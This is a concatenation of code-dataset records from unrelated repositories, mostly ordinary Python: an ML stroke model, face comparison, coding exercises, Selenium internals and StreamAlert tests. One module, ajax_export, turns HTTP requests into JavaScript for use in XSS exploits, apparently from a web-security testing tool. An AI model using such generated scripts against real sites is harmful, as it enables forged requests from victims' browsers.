'OutSample_Accuracy':round(out_accuracy, 4),\n 'InSample_Recall':round(in_recall, 4),\n 'OutSample_Recall':round(out_recall, 4),\n 'InSample_Precision':round(in_precision, 4),\n 'OutSample_Precision':round(out_precision, 4),\n 'InSample_F1_Score':round(in_f1_score, 4),\n 'OutSample_F1_Score':round(out_f1_score, 4)},\n ignore_index=True)\n\n return running_df # return results dataframe\n\n# -------------------------- the shotgun -------------------------- #\n\ndef classification_shotgun(X_insample, y_insample, X_outsample, y_outsample):\n \"\"\" Take in Pandas Series for classification and target (pass columns!),\n Create several DecisionTree, RandomForest, LogisticRegression, Naive Bayes,\n and KNearest classification models, \n Push model predictions to originating dataframe, return dataframe \"\"\"\n # convert predictions column (usually Series) to dataframe\n if type(y_insample) != 'pandas.core.frame.DataFrame':\n y_insample = pd.DataFrame(y_insample.rename('in_actuals'))\n if type(y_outsample) != 'pandas.core.frame.DataFrame':\n y_outsample = pd.DataFrame(y_outsample.rename('out_actuals'))\n # Baseline - add predictions to df\n y_insample, y_outsample = classification_bl(y_insample, y_outsample)\n # Decision Tree classifier - add predictions to df\n y_insample, y_outsample = decisiontree(X_insample, y_insample, X_outsample, y_outsample)\n # Random Forest classifier - add predictions to df\n y_insample, y_outsample = randomforest(X_insample, y_insample, X_outsample, y_outsample)\n # Logistic Regression classifier - add predictions to df\n y_insample, y_outsample = logisticregression(X_insample, y_insample, X_outsample, y_outsample)\n # Naive Bayes classifier - add predictions to df\n y_insample, y_outsample = naivebayes(X_insample, y_insample, X_outsample, y_outsample)\n # K-Nearest Neighbors classifier - add predictions to df\n y_insample, y_outsample = knearestneighbors(X_insample, y_insample, X_outsample, y_outsample)\n \n return y_insample, y_outsample # return dataframes of predictions\n\n# -------------------------- the models -------------------------- #\n\ndef manual_baseline(y_insample, y_outsample, baseline_value):\n \"\"\" Add a column for the manually-selected baseline prediction \"\"\"\n # set each value to the chosen baseline value\n y_insample['manual_baseline'] = baseline_value\n y_outsample['manual_baseline'] = baseline_value\n\n return y_insample, y_outsample # return df with baseline predictions column\n\ndef classification_bl(y_insample, y_outsample):\n \"\"\" Calculate baseline using mode class for model comparison \"\"\"\n # find baseline\n mode = y_insample.in_actuals.mode().tolist()[0]\n # set baseline as prediction\n y_insample['baseline'] = mode\n y_outsample['baseline'] = mode\n\n return y_insample, y_outsample # return df with baseline predictions column\n\ndef decisiontree(X_insample, y_insample, X_outsample, y_outsample):\n \"\"\" Creates decision trees with max_depth 1,2,3,5,10 and random_state=123 \"\"\"\n # set loop list\n max_depths = [1,2,3,5,10]\n # loop through max depths\n for depth in max_depths:\n # create decision trees\n tree = DecisionTreeClassifier(max_depth=depth, random_state=123)\\\n .fit(X_insample, y_insample.in_actuals)\n # make predictions in new columns\n y_insample['tree_maxdepth' + str(depth)] = tree.predict(X_insample)\n y_outsample['tree_maxdepth' + str(depth)] = tree.predict(X_outsample)\n\n return y_insample, y_outsample # return dataframe with predictions appended\n\ndef randomforest(X_insample, y_insample, X_outsample, y_outsample):\n \"\"\" Creates random forests with max_depth 1,2,3,5,10 and random_state=123 \"\"\"\n # set loop list\n max_depths = [1,2,3,5,10]\n # loop through max depths\n for depth in max_depths:\n # create random forest model\n rf = RandomForestClassifier(max_depth=depth, random_state=123)\\\n .fit(X_insample, y_insample.in_actuals)\n # make predictions in new columns\n y_insample['rf_depth' + str(depth)] = rf.predict(X_insample)\n y_outsample['rf_depth' + str(depth)] = rf.predict(X_outsample)\n \n return y_insample, y_outsample # return dataframe with predictions appended\n\ndef logisticregression(X_insample, y_insample, X_outsample, y_outsample):\n \"\"\" Creates logistic regressions with random_state=123 \"\"\"\n # create logistic regression model\n logit = LogisticRegression(random_state=123)\\\n .fit(X_insample, y_insample.in_actuals)\n # add columns for predictions\n y_insample['logit'] = logit.predict(X_insample)\n y_outsample['logit'] = logit.predict(X_outsample)\n \n return y_insample, y_outsample # return dataframe with predictions appended\n\ndef naivebayes(X_insample, y_insample, X_outsample, y_outsample):\n \"\"\" Creates Naive-Bayes with var_smoothing of .001, .01, 10, 100 \"\"\"\n # set loop list\n smooth_levels = [.000000001, .00000001, .0000001, .000001, .00001, .0001, .001, .01, 10, 100]\n # loop through smoothing levels\n for smooth_level in smooth_levels:\n # create naive bayes model\n nb = GaussianNB(var_smoothing=smooth_level)\\\n .fit(X_insample, y_insample.in_actuals)\n # make predictions in new column\n y_insample['nb_vsmooth' + str(smooth_level)] = nb.predict(X_insample)\n y_outsample['nb_vsmooth' + str(smooth_level)] = nb.predict(X_outsample)\n \n return y_insample, y_outsample # return dataframe with preds appended\n\ndef knearestneighbors(X_insample, y_insample, X_outsample, y_outsample):\n \"\"\" Create KNNs with neighbor counts of 3, 5, 10, 25, 75 \"\"\"\n # set loop list\n neighbor_counts = [3,5,10,25,75]\n # loop through neighbor counts\n for neighbor_count in neighbor_counts:\n # create knn model\n knn = KNeighborsClassifier(n_neighbors=neighbor_count)\\\n .fit(X_insample, y_insample.in_actuals)\n # make predictions in new column\n y_insample['knn_n' + str(neighbor_count)] = knn.predict(X_insample)\n y_outsample['knn_n' + str(neighbor_count)] = knn.predict(X_outsample)\n \n return y_insample, y_outsample # return dataframe with preds appended\n\n# ------------------------- pre-processing ------------------------- #\n\ndef Min_Max_Scaler(X_train, X_validate, X_test):\n \"\"\"\n Takes in X_train, X_validate and X_test dfs with numeric values only\n Returns scaler, X_train_scaled, X_validate_scaled, X_test_scaled dfs\n \"\"\"\n #Fit the thing\n scaler = MinMaxScaler().fit(X_train)\n #transform the thing\n X_train_scaled = pd.DataFrame(scaler.transform(X_train), index = X_train.index, columns = X_train.columns)\n X_validate_scaled = pd.DataFrame(scaler.transform(X_validate), index = X_validate.index, columns = X_validate.columns)\n X_test_scaled = pd.DataFrame(scaler.transform(X_test), index = X_test.index, columns = X_test.columns)\n return scaler, X_train_scaled, X_validate_scaled, X_test_scaled\n\ndef smoter(X_train, y_train):\n \"\"\" Use SMOTE+Tomek to eliminate class imbalances for train split \"\"\"\n # build SMOTE\n smtom = SMOTETomek(random_state=123)\n # SMOTE the train set\n X_train_smtom, y_train_smtom = smtom.fit_resample(X_train, y_train)\n # show before-and-after\n print(\"Before SMOTE applied:\", X_train.shape, y_train.shape)\n print(\"After SMOTE applied:\", X_train_smtom.shape, y_train_smtom.shape)\n\n return X_train_smtom, y_train_smtom # return SMOTE-d train data\n\n# ------------------ risk_calculator.py functions ------------------ #\n\ndef risk_calculator_prep_data():\n \"\"\"\n Ingests the healthcare dataset,\n Drops the same rows that were dropped for analysis,\n Cleans and encodes data as necessary,\n Limits the data to the required features,\n Splits the data in the same way as was done for the team's analysis,\n Isolates the target from the split needed to train the model,\n Oversamples the data the same way it was done for the analysis,\n Return the data needed to train the model.\n \"\"\"\n # ingest data\n df = pd.read_csv('healthcare-dataset-stroke-data.csv')\n # drops a few rows that were dropped for other reasons in analysis\n df = df.drop([3116,2128,4209]).reset_index().drop(columns='index')\n # create features\n df['stroke'] = df['stroke'] == 1\n df['high_glucose'] = df['avg_glucose_level'] >= 125\n df['has_hypertension'] = df['hypertension'] == 1\n df['has_heart_disease'] = df['heart_disease'] == 1\n df['ever_married'] = df['ever_married'] == 'Yes'\n # limit to required features\n df = df[['stroke','age','high_glucose','has_hypertension','has_heart_disease','ever_married']]\n # split data\n train_validate, test = train_test_split(df, test_size=.2, random_state=777)\n train, validate = train_test_split(train_validate, test_size=.25, random_state=777)\n # isolate target\n X_train, y_train = train.drop(columns='stroke'), train.stroke\n # SMOTE+Tomek oversampling\n \"\"\" Use SMOTE+Tomek to eliminate class imbalances for train split \"\"\"\n # build SMOTE\n smtom = SMOTETomek(random_state=123)\n # SMOTE the train set\n X_train, y_train = smtom.fit_resample(X_train, y_train)\n # return data needed to train model\n return X_train, y_train\n\ndef risk_calculator_calculate_risk(user_input_row):\n \"\"\"\n Re-creates the best-performing model from the Stroke Prediction team's analysis,\n Fits it on the data used in the analysis,\n Use sklearn's predict_proba method to calculate the risk of stroke,\n Return the calculated number.\n \"\"\"\n X_train, y_train = risk_calculator_prep_data()\n model = GaussianNB(var_smoothing=.01).fit(X_train, y_train)\n calculated_risk = model.predict_proba(user_input_row)\n calculated_risk = int(calculated_risk[0][1] * 100)\n\n return calculated_risk","repo_name":"stroke-predictors/germain-capstone-stroke-prediction","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":13269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16406225507","text":"import cv2\nimport dlib\nimport numpy as np # upgrade to 1.8.0\nfrom scipy.spatial import distance\n\n'''\nGet largest detected faces from an image\n input : image (png,jpg,jfif,jpeg)\n return: rectangle\n'''\ndef crop_face(image):\n gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n face_detector = dlib.get_frontal_face_detector()\n detected_faces = face_detector(image, 1)\n if(len(detected_faces)==0):\n return None\n else:\n max = 0\n for i,face_rect in enumerate(detected_faces):\n if((face_rect.width()+face_rect.height()) > (detected_faces[max].width()+detected_faces[max].height())):\n max = i\n return detected_faces[max]\n\n'''\nCheck if a input threshold can be converted to float and is greater than 0\n input : string\n return: threshold: float, valid: boolean\n'''\ndef validate_threshold(threshold_string):\n valid = False\n try : \n threshold = float(threshold_string) \n if(threshold > 0):\n valid = True\n except : \n threshold = None\n\n return threshold, valid\n \n\n'''\nCompare the face from 2 different picture\n input : \n - img_1 : first image to compare\n - img_2 : second image to compare\n - threshold : threshold for classification\n return : \n - dst : distance of image compare result using euclidean\n - res : result of image comparation, True if same person, False if different person\n - message : information about process result\n'''\ndef face_compare_process(img_file_1, img_file_2, threshold):\n try:\n # Load image 1 and image 2 file\n img_1 = cv2.imdecode(np.frombuffer(img_file_1, np.uint8), cv2.COLOR_BGR2RGB)\n img_2 = cv2.imdecode(np.frombuffer(img_file_2, np.uint8), cv2.COLOR_BGR2RGB)\n \n # Crop face from both image\n dets_1 = crop_face(img_1)\n dets_2 = crop_face(img_2)\n\n if(dets_1 is None or dets_2 is None):\n raise Exception(\"Face not found\")\n\n shape = sp_68(img_1, dets_1)\n face_descriptor_1 = facerec.compute_face_descriptor(img_1, shape)\n if(len(face_descriptor_1)==0):\n shape = sp_5(img_1, dets)\n face_descriptor_1 = facerec.compute_face_descriptor(img_1, shape)\n\n shape = sp_68(img_2, dets_2)\n face_descriptor_2 = facerec.compute_face_descriptor(img_2, shape)\n if(len(face_descriptor_2)==0):\n shape = sp_5(img_2, dets)\n face_descriptor_2 = facerec.compute_face_descriptor(img_2, shape)\n \n # Measure the distance\n dst = distance.euclidean(face_descriptor_1, face_descriptor_2)\n res = dst < threshold\n\n return dst,res,\"Operation successful\"\n\n except Exception as e:\n return None,None,e.args\n\nsp_5 = dlib.shape_predictor('model/shape_predictor_5_face_landmarks.dat')\nsp_68 = dlib.shape_predictor('model/shape_predictor_68_face_landmarks.dat')\nfacerec = dlib.face_recognition_model_v1('model/dlib_face_recognition_resnet_model_v1.dat')\nprint(\"Load Models\")","repo_name":"irhw110/Face_Comparation_API","sub_path":"functions/face_compare.py","file_name":"face_compare.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22875471133","text":"# Exercise 3: Write a program to read through a mail log, build a histogram using a dictionary to count how many messages have come from\n# each email address, and print the dictionary.\n\nfile = open('test.txt')\ncount = dict()\nfor line in file:\n line = line.strip()\n if not line.startswith(\"From\"):\n continue\n words = line.split()\n if len(words) < 3:\n continue\n mail = words[1]\n count[mail] = count.get(mail, 0) + 1\nprint(count)\n","repo_name":"YanShtein/PythonForEverybody","sub_path":"009.3.mail_count.py","file_name":"009.3.mail_count.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"32223826261","text":"import imp\nfrom typing import List\nimport collections\n# o(n^2) Accepted\nclass Solution:\n def findRightInterval(self, intervals: List[List[int]]) -> List[int]:\n index_map = collections.defaultdict(int)\n for idx, interval in enumerate(intervals):\n index_map[interval[0], interval[1]] = idx\n \n intervals.sort(key= lambda x: x[0])\n ans = [0 for i in range(len(intervals))]\n for i in range(len(intervals)):\n find = False\n for inter in intervals[i:]:\n if inter[0] >= intervals[i][1]:\n ans[index_map[intervals[i][0], intervals[i][1]]] = index_map[inter[0], inter[1]]\n find = True\n break\n if not find:\n ans[index_map[intervals[i][0], intervals[i][1]]] = -1\n \n return ans\n\nsol = Solution()\nintervals = [[1,1],[3,4]]\n\nres = sol.findRightInterval(intervals)\nprint(res)\n\n\n \n\n\n\n\n\n\n ","repo_name":"chrisbyd/leetcode_chris","sub_path":"array/436.py","file_name":"436.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42562047704","text":"from core.data.parsers.httpRequestParser import httpRequestParser\n\n\ndef ajax_escape_string( str_in ):\n str_out = str_in.replace('\"', '\\\\\"')\n return str_out\n\n\ndef ajax_export( request_string ):\n '''\n @parameter request_string: The string of the request to export\n @return: A javascript that will perform the same HTTP request.\n '''\n # get the header and the body\n splitted_request = request_string.split('\\n\\n')\n header = splitted_request[0]\n body = '\\n\\n'.join(splitted_request[1:])\n \n http_request = httpRequestParser( header, body)\n \n # Now I do the real magic...\n # This is the header, to include the AJAX stuff:\n res = '''/* Init AJAX stuff */\n \nvar xmlhttp=false;\n/*@cc_on @*/\n/*@if (@_jscript_version >= 5)\n// JScript gives us Conditional compilation, we can cope with old IE versions.\n// and security blocked creation of the objects.\ntry {\n xmlhttp = new ActiveXObject(\"Msxml2.XMLHTTP\");\n} catch (e) {\n try {\n xmlhttp = new ActiveXObject(\"Microsoft.XMLHTTP\");\n } catch (E) {\n xmlhttp = false;\n }\n}\n@end @*/\n\nif (!xmlhttp && typeof XMLHttpRequest!='undefined') {\n try {\n xmlhttp = new XMLHttpRequest();\n } catch (e) {\n xmlhttp=false;\n }\n}\nif (!xmlhttp && window.createRequest) {\n try {\n xmlhttp = window.createRequest();\n } catch (e) {\n xmlhttp=false;\n }\n}\n/* Finished AJAX initialization */\n\n/* Create the request */\n'''\n \n # Set the method and the path\n res += 'xmlhttp.open(\"' + http_request.getMethod() + '\", \"'\n res += ajax_escape_string( http_request.getURI().url_string ) + '\",true);\\n'\n\n # For debugging\n res += '''\n/* Debugging code, this should be removed for real life XSS exploits */\nxmlhttp.onreadystatechange=function() {\n if (xmlhttp.readyState==4) {\n alert(xmlhttp.responseText)\n }\n}\n\n\n/* Add headers to the request and send it */\n'''\n\n # Now I add the headers:\n headers = http_request.getHeaders()\n for header_name in headers:\n res += 'xmlhttp.setRequestHeader(\"' + ajax_escape_string(header_name) + '\", \"'\n res += ajax_escape_string(headers[header_name]) + '\");\\n'\n \n # And finally the post data (if any)\n if http_request.getData() and http_request.getData() != '\\n':\n res += 'var post_data = ().toString();\\n'\n res += 'xmlhttp.send(post_data);\\n'\n else:\n res += 'xmlhttp.send(null);\\n'\n \n return res\n","repo_name":"adambaldwin2/test","sub_path":"core/data/export/ajax_export.py","file_name":"ajax_export.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27685624225","text":"import errno\nimport logging\nimport os\nimport subprocess\nimport typing\nfrom abc import ABC\nfrom abc import abstractmethod\nfrom platform import system\nfrom subprocess import DEVNULL\nfrom subprocess import PIPE\nfrom time import sleep\nfrom urllib import request\nfrom urllib.error import URLError\n\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.types import SubprocessStdAlias\nfrom selenium.webdriver.common import utils\nfrom selenium.webdriver.common.selenium_manager import SeleniumManager\n\nlogger = logging.getLogger(__name__)\n\n\n_HAS_NATIVE_DEVNULL = True\n\n\nclass Service(ABC):\n \"\"\"The abstract base class for all service objects. Services typically launch a child program\n in a new process as an interim process to communicate with a browser.\n\n :param executable: install path of the executable.\n :param port: Port for the service to run on, defaults to 0 where the operating system will decide.\n :param log_file: (Optional) file descriptor (pos int) or file object with a valid file descriptor.\n subprocess.PIPE & subprocess.DEVNULL are also valid values.\n :param env: (Optional) Mapping of environment variables for the new process, defaults to `os.environ`.\n \"\"\"\n\n def __init__(\n self,\n executable: str,\n port: int = 0,\n log_file: SubprocessStdAlias = DEVNULL,\n env: typing.Optional[typing.Mapping[typing.Any, typing.Any]] = None,\n start_error_message: typing.Optional[str] = None,\n ) -> None:\n self.path = executable\n self.port = port or utils.free_port()\n self.log_file = open(os.devnull, \"wb\") if not _HAS_NATIVE_DEVNULL and log_file == DEVNULL else log_file\n self.start_error_message = start_error_message or \"\"\n # Default value for every python subprocess: subprocess.Popen(..., creationflags=0)\n self.creation_flags = 0\n self.env = env or os.environ\n\n @property\n def service_url(self) -> str:\n \"\"\"\n Gets the url of the Service\n \"\"\"\n return f\"http://{utils.join_host_port('localhost', self.port)}\"\n\n @abstractmethod\n def command_line_args(self) -> typing.List[str]:\n \"\"\"A List of program arguments (excluding the executable).\"\"\"\n raise NotImplementedError(\"This method needs to be implemented in a sub class\")\n\n def start(self) -> None:\n \"\"\"\n Starts the Service.\n\n :Exceptions:\n - WebDriverException : Raised either when it can't start the service\n or when it can't connect to the service\n \"\"\"\n try:\n self._start_process(self.path)\n except WebDriverException as err:\n if \"executable needs to be in PATH\" in err.msg:\n logger.debug(\"driver not found in PATH, trying Selenium Manager\")\n browser = self.__class__.__module__.split(\".\")[-2]\n\n try:\n path = SeleniumManager().driver_location(browser)\n except WebDriverException as new_err:\n logger.debug(\"Unable to obtain driver using Selenium Manager: \" + new_err.msg)\n raise err\n\n self._start_process(path)\n\n count = 0\n while True:\n self.assert_process_still_running()\n if self.is_connectable():\n break\n\n count += 1\n sleep(0.5)\n if count == 60:\n raise WebDriverException(f\"Can not connect to the Service {self.path}\")\n\n def assert_process_still_running(self) -> None:\n \"\"\"Check if the underlying process is still running.\"\"\"\n return_code = self.process.poll()\n if return_code:\n raise WebDriverException(f\"Service {self.path} unexpectedly exited. Status code was: {return_code}\")\n\n def is_connectable(self) -> bool:\n \"\"\"Establishes a socket connection to determine if the service running on\n the port is accessible.\"\"\"\n return utils.is_connectable(self.port)\n\n def send_remote_shutdown_command(self) -> None:\n \"\"\"\n Dispatch an HTTP request to the shutdown endpoint for the service in an\n attempt to stop it.\n \"\"\"\n try:\n request.urlopen(f\"{self.service_url}/shutdown\")\n except URLError:\n return\n\n for _ in range(30):\n if not self.is_connectable():\n break\n sleep(1)\n\n def stop(self) -> None:\n \"\"\"\n Stops the service.\n \"\"\"\n if self.log_file != PIPE and not (self.log_file == DEVNULL and _HAS_NATIVE_DEVNULL):\n try:\n # Todo: Be explicit in what we are catching here.\n if hasattr(self.log_file, \"close\"):\n self.log_file.close() # type: ignore\n except Exception:\n pass\n\n if self.process is not None:\n try:\n self.send_remote_shutdown_command()\n except TypeError:\n pass\n self._terminate_process()\n\n def _terminate_process(self) -> None:\n \"\"\"Terminate the child process. On POSIX this attempts a graceful\n SIGTERM followed by a SIGKILL, on a Windows OS kill is an alias to\n terminate. Terminating does not raise itself if something has gone\n wrong but (currently) silently ignores errors here.\"\"\"\n try:\n stdin, stdout, stderr = self.process.stdin, self.process.stdout, self.process.stderr\n for stream in stdin, stdout, stderr:\n try:\n stream.close() # type: ignore\n except AttributeError:\n pass\n self.process.terminate()\n self.process.wait(60)\n # Todo: only SIGKILL if necessary; the process may be cleanly exited by now.\n self.process.kill()\n except OSError:\n logger.error(\"Error terminating service process.\", exc_info=True)\n\n def __del__(self) -> None:\n # `subprocess.Popen` doesn't send signal on `__del__`;\n # so we attempt to close the launched process when `__del__`\n # is triggered.\n # do not use globals here; interpreter shutdown may have already cleaned them up\n # and they would be `None`. This goes for anything this method is referencing internally.\n try:\n self.stop()\n except Exception:\n pass\n\n def _start_process(self, path: str) -> None:\n \"\"\"\n Creates a subprocess by executing the command provided.\n\n :param cmd: full command to execute\n \"\"\"\n cmd = [path]\n cmd.extend(self.command_line_args())\n try:\n self.process = subprocess.Popen(\n cmd,\n env=self.env,\n close_fds=system() != \"Windows\",\n stdout=self.log_file,\n stderr=self.log_file,\n stdin=PIPE,\n creationflags=self.creation_flags,\n )\n logger.debug(f\"Started executable: `{self.path}` in a child process with pid: {self.process.pid}\")\n except TypeError:\n raise\n except OSError as err:\n if err.errno == errno.ENOENT:\n raise WebDriverException(\n f\"'{os.path.basename(self.path)}' executable needs to be in PATH. {self.start_error_message}\"\n )\n elif err.errno == errno.EACCES:\n raise WebDriverException(\n f\"'{os.path.basename(self.path)}' executable may have wrong permissions. {self.start_error_message}\"\n )\n else:\n raise\n except Exception as e:\n raise WebDriverException(\n f\"The executable {os.path.basename(self.path)} needs to be available in the path. {self.start_error_message}\\n{str(e)}\"\n )\n","repo_name":"cwyrwas/ChatGPT-Content-Generator","sub_path":".venv/Lib/site-packages/selenium/webdriver/common/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":7856,"program_lang":"python","lang":"en","doc_type":"code","stars":126,"dataset":"github-code","pt":"61"} +{"seq_id":"23413576041","text":"#!/usr/bin/python\n\nimport sys\n\n\ndef solveThingy(firstAnswer, firstArangement, secondAnswer, secondArangement):\n\tcandidates = firstArangement[firstAnswer-1]\n\tanswers = []\n\tfor num in secondArangement[secondAnswer-1]:\n\t\tif num in candidates:\n\t\t\tanswers += [num]\n\t\n\treturn answers\n\nf = open(\"input.txt\")\nnumTests = int(f.readline())\noutput = \"\"\nfor i in range(numTests):\n\tfirstAnswer = int(f.readline())\n\tfirstArangement = []\n\tfor j in range(4):\n\t\tline = []\n\t\tfor num in f.readline().split(' '):\n\t\t\tline += [int(num)]\n\t\tfirstArangement += [line]\n\tsecondAnswer = int(f.readline())\n\tsecondArangement = []\n\tfor j in range(4):\n\t\tline = []\n\t\tfor num in f.readline().split(' '):\n\t\t\tline += [int(num)]\n\t\tsecondArangement += [line]\n\n\tanswers = solveThingy(firstAnswer, firstArangement, secondAnswer, secondArangement)\n\n\tif len(answers) == 1:\n\t\toutput += \"Case #\" + str(i+1) + \": \" + str(answers[0]) + '\\n'\n\telif len(answers) == 0:\n\t\toutput += \"Case #\" + str(i+1) + \": Volunteer cheated!\" + '\\n'\n\telse:\n\t\toutput += \"Case #\" + str(i+1) + \": Bad magician!\" + '\\n'\n\t\t\nfout = open(\"output.txt\", \"w\")\nfout.write(output)\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/2374.py","file_name":"2374.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"949116981","text":"\"\"\"Test ./manage.py lambda rollback functionality.\"\"\"\nimport unittest\n\nfrom mock import call, patch\nfrom nose.tools import assert_equal\n\nfrom stream_alert_cli.manage_lambda import rollback\nfrom tests.unit.helpers.base import basic_streamalert_config, MockCLIConfig\n\n\nclass MockOptions(object):\n \"\"\"Simple mock for the options parsed from the command line arguments.\"\"\"\n\n def __init__(self, clusters, processor):\n self.clusters = clusters\n self.processor = processor\n\n\n@patch.object(rollback, 'LOGGER_CLI')\n@patch.object(rollback, 'terraform_generate', return_value=True)\n@patch.object(rollback.helpers, 'tf_runner')\nclass RollbackTest(unittest.TestCase):\n \"\"\"Test the config updates and Terraform targets affected during a Lambda rollback.\"\"\"\n\n def setUp(self):\n self.config = MockCLIConfig(config=basic_streamalert_config())\n\n # Find all function config sections (with 'current_version')\n self.alert_merger_config = self.config['lambda']['alert_merger_config']\n self.alert_config = self.config['lambda']['alert_processor_config']\n self.apps_config_box = (\n self.config['clusters']['corp']['modules']['stream_alert_apps']['box_collector'])\n self.apps_config_duo = (\n self.config['clusters']['corp']['modules']['stream_alert_apps']['duo_admin_collector'])\n self.athena_config = self.config['lambda']['athena_partition_refresh_config']\n self.downloader_config = self.config['lambda']['threat_intel_downloader_config']\n self.rule_config_prod = (\n self.config['clusters']['prod']['modules']['stream_alert']['rule_processor'])\n self.rule_config_corp = (\n self.config['clusters']['corp']['modules']['stream_alert']['rule_processor'])\n\n self.func_configs = [\n self.alert_merger_config, self.alert_config, self.apps_config_box, self.apps_config_duo,\n self.athena_config, self.downloader_config, self.rule_config_prod, self.rule_config_corp\n ]\n\n def test_rollback_all(self, mock_runner, mock_generate, mock_logger):\n \"\"\"CLI - Lambda Rollback all\"\"\"\n options = MockOptions(None, ['all'])\n\n for config in self.func_configs:\n config['current_version'] = 3\n\n rollback.rollback(options, self.config)\n\n # Verify that all of the versions were rolled back\n for config in self.func_configs:\n assert_equal(config['current_version'], 2)\n\n mock_logger.assert_not_called()\n mock_generate.assert_called_once_with(config=self.config)\n mock_runner.assert_called_once_with(targets=[\n 'module.alert_merger_lambda',\n 'module.alert_processor_lambda',\n 'module.box_collector_corp',\n 'module.duo_admin_collector_corp',\n 'module.stream_alert_athena',\n 'module.stream_alert_corp',\n 'module.stream_alert_prod',\n 'module.threat_intel_downloader'\n ])\n\n def test_rollback_all_invalid(self, mock_runner, mock_generate, mock_logger):\n \"\"\"CLI - Lambda Rollback all invalid\"\"\"\n options = MockOptions(None, ['all'])\n\n # Versions $LATEST and 1 cannot be rolled back.\n self.alert_config['current_version'] = 1\n rollback.rollback(options, self.config)\n\n fmt = '%s cannot be rolled back from version %s'\n mock_logger.assert_has_calls([\n call.warn(fmt, 'alert_merger', '$LATEST'),\n call.warn(fmt, 'alert_processor', '1'),\n call.warn(fmt, 'duo_admin_collector_corp', '$LATEST'),\n call.warn(fmt, 'box_collector_corp', '$LATEST'),\n call.warn(fmt, 'athena_partition_refresh', '$LATEST'),\n call.warn(fmt, 'rule_processor_prod', '$LATEST'),\n call.warn(fmt, 'rule_processor_corp', '$LATEST'),\n call.warn(fmt, 'threat_intel_downloader_config', '$LATEST')\n ], any_order=True)\n\n # We should have returned early - no Terraform actions necessary\n mock_generate.assert_not_called()\n mock_runner.assert_not_called()\n\n def test_rollback_alert_processor(self, mock_runner, mock_generate, mock_logger):\n \"\"\"CLI - Lambda Rollback global alert processor\"\"\"\n options = MockOptions(None, ['alert'])\n self.alert_config['current_version'] = 5\n\n rollback.rollback(options, self.config)\n\n assert_equal(4, self.alert_config['current_version'])\n mock_logger.assert_not_called()\n mock_generate.assert_called_once_with(config=self.config)\n mock_runner.assert_called_once_with(targets=['module.alert_processor_lambda'])\n\n def test_rollback_rule_single_cluster(self, mock_runner, mock_generate, mock_logger):\n \"\"\"CLI - Lambda Rollback rule processor in one cluster\"\"\"\n options = MockOptions(['prod'], ['rule'])\n\n self.rule_config_corp['current_version'] = 2\n self.rule_config_prod['current_version'] = 2\n\n rollback.rollback(options, self.config)\n\n # Only the prod rule processor should have been rolled back\n assert_equal(2, self.rule_config_corp['current_version'])\n assert_equal(1, self.rule_config_prod['current_version'])\n\n mock_logger.assert_not_called()\n mock_generate.assert_called_once_with(config=self.config)\n mock_runner.assert_called_once_with(targets=['module.stream_alert_prod'])\n","repo_name":"royadityak/streamalert","sub_path":"tests/unit/stream_alert_cli/manage_lambda/test_rollback.py","file_name":"test_rollback.py","file_ext":"py","file_size_in_byte":5382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"43720122292","text":"#!/usr/bin/python3\n\nimport sys\nsys.setrecursionlimit(5000)\n\npart2 = True\nlines = open('i.txt', 'r').read().strip().split('\\n')\n\ncoord = []\nfor line in lines:\n x, y, z = map(int, line.split(','))\n coord.append((x, y, z))\n\nmx = max(x for x, y, z in coord) + 1\nmy = max(y for x, y, z in coord) + 1\nmz = max(z for x, y, z in coord) + 1\n\nvolume = [[[0 for _ in range(mx)] for _ in range(my)] for _ in range(mz)]\n\nfor x, y, z in coord:\n volume[z][y][x] = 1\n\nconn = set()\n\ndef dfs(u, vol, v, c):\n global conn\n\n x, y, z = u\n\n if v[z][y][x] != -1:\n return\n\n v[z][y][x] = c\n\n if x - 1 >= 0:\n if vol[z][y][x - 1] == 0:\n dfs((x - 1, y, z), vol, v, c)\n else: conn.add(c)\n if x + 1 < mx:\n if vol[z][y][x + 1] == 0:\n dfs((x + 1, y, z), vol, v, c)\n else: conn.add(c)\n if y - 1 >= 0:\n if vol[z][y - 1][x] == 0:\n dfs((x, y - 1, z), vol, v, c)\n else: conn.add(c)\n if y + 1 < my:\n if vol[z][y + 1][x] == 0:\n dfs((x, y + 1, z), vol, v, c)\n else: conn.add(c)\n if z - 1 >= 0:\n if vol[z - 1][y][x] == 0:\n dfs((x, y, z - 1), vol, v, c)\n else: conn.add(c)\n if z + 1 < mz:\n if vol[z + 1][y][x] == 0:\n dfs((x, y, z + 1), vol, v, c)\n else: conn.add(c)\n\nv = [[[-1 for _ in range(mx)] for _ in range(my)] for _ in range(mz)]\nc = 0\nfor z in range(mz):\n for y in range(my):\n for x in range(mx):\n if v[z][y][x] == -1 and volume[z][y][x] == 0:\n dfs((x, y, z), volume, v, c)\n c += 1\n\nsa = 0\nfor x, y, z in coord:\n if x - 1 >= 0:\n if v[z][y][x - 1] in conn or not part2:\n sa += 1 - volume[z][y][x - 1]\n else: sa += 1\n if x + 1 < mx:\n if v[z][y][x + 1] in conn or not part2:\n sa += 1 - volume[z][y][x + 1]\n else: sa += 1\n if y - 1 >= 0:\n if v[z][y - 1][x] in conn or not part2:\n sa += 1 - volume[z][y - 1][x]\n else: sa += 1\n if y + 1 < my:\n if v[z][y + 1][x] in conn or not part2:\n sa += 1 - volume[z][y + 1][x]\n else: sa += 1\n if z - 1 >= 0:\n if v[z - 1][y][x] in conn or not part2:\n sa += 1 - volume[z - 1][y][x]\n else: sa += 1\n if z + 1 